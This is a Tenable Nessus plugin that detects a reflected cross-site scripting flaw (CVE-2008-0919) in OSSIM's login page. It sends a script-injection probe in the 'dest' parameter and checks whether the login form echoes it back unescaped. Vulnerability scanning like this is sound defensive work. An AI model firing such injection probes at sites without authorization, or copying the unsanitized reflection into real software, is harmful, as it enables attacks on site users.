#
# (C) Tenable Network Security, Inc.
#


if (description)
{
  script_id(31133);
  script_version("$Revision: 1.3 $");

  script_cve_id("CVE-2008-0919");
  script_bugtraq_id(27929);
  script_xref(name:"milw0rm", value:"5171");
  script_xref(name:"OSVDB", value:"42007");

  script_name(english:"OSSIM Framework dest Parameter Cross-Site Scripting Vulnerability");
  script_summary(english:"Tries to inject script code into login form");

  desc = "
Synopsis :

The remote web server contains a PHP application that is affected by a
cross-site scripting vulnerability. 

Description :

The remote host is running OSSIM (Open Source Security Information
Management), a suite of security tools managed by a web-based
front-end. 

The version of OSSIM installed on the remote host fails to sanitize
user input to the 'dest' parameter of the 'session/login.php' script
before using it to generate dynamic HTML output.  An unauthenticated
attacker can exploit this to inject arbitrary HTML and script code
into a user's browser to be executed within the security context of
the affected site. 

Note that there is also reportedly a SQL injection vulnerability
associated with this version of OSSIM, although Nessus has not checked
for it. 

See also :

http://www.securityfocus.com/archive/1/488450/30/0/threaded

Solution :

Unknown at this time.

Risk factor :

Medium / CVSS Base Score : 4.3
(CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N)";
  script_description(english:desc);

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses : XSS");

  script_copyright(english:"This script is Copyright (C) 2008 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("url_func.inc");


port = get_http_port(default:80);
if (!get_port_state(port)) exit(0);
if (!can_host_php(port:port)) exit(0);


exploit = string('nessus">', "<script>alert('", SCRIPT_NAME, "')</script><!-- ");


# Loop through directories.
if (thorough_tests) dirs = make_list("/ossim", cgi_dirs());
else dirs = make_list(cgi_dirs());

foreach dir (dirs)
{
  # Inject some script code.
  req = http_get(
    item:string(
      dir, "/session/login.php?",
      "dest=", urlencode(str:exploit)
    ),
    port:port
  );
  res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
  if (res == NULL) exit(0);

  # There's a problem if we see our exploit in the form.
  if (
    (
      "<title> OSSIM Framework Login" >< res ||
      "<h1> OSSIM Login" >< res ||
      'alt="OSSIM logo"' >< res
    ) &&
    string('type="hidden" name="dest" value="', exploit, '">') >< res
  )
  {
    security_warning(port);
    exit(0);
  }
}
